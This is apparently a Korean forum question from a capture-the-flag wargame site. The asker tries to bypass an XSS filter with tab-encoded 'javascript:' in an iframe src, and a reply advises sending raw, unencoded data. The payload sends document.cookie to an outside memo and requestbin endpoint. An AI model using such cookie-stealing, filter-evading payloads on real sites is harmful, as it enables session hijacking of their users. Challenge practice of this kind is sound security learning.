우회방법과 cookie 질문드립니다...
iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요,
iframe src="javascri%09pt:locatio%09n.href=%27~~~.dreamhack.games/?memo=%27+docu%09ment.gookie;">
구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고
flag 페이지에선 아무것도 전송되지 않습니다...
<iframe srcdoc 로는 javascript:~~ 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ
#web
작성자 정보
답변
1
탈퇴한 이용자
대표 업적 없음
인코딩 되기 전 raw 데이터로 바꿔서 넣어보세요
그리고 디테일한 부분만 조정하시면 충분히 플래그를 얻을 수 있어요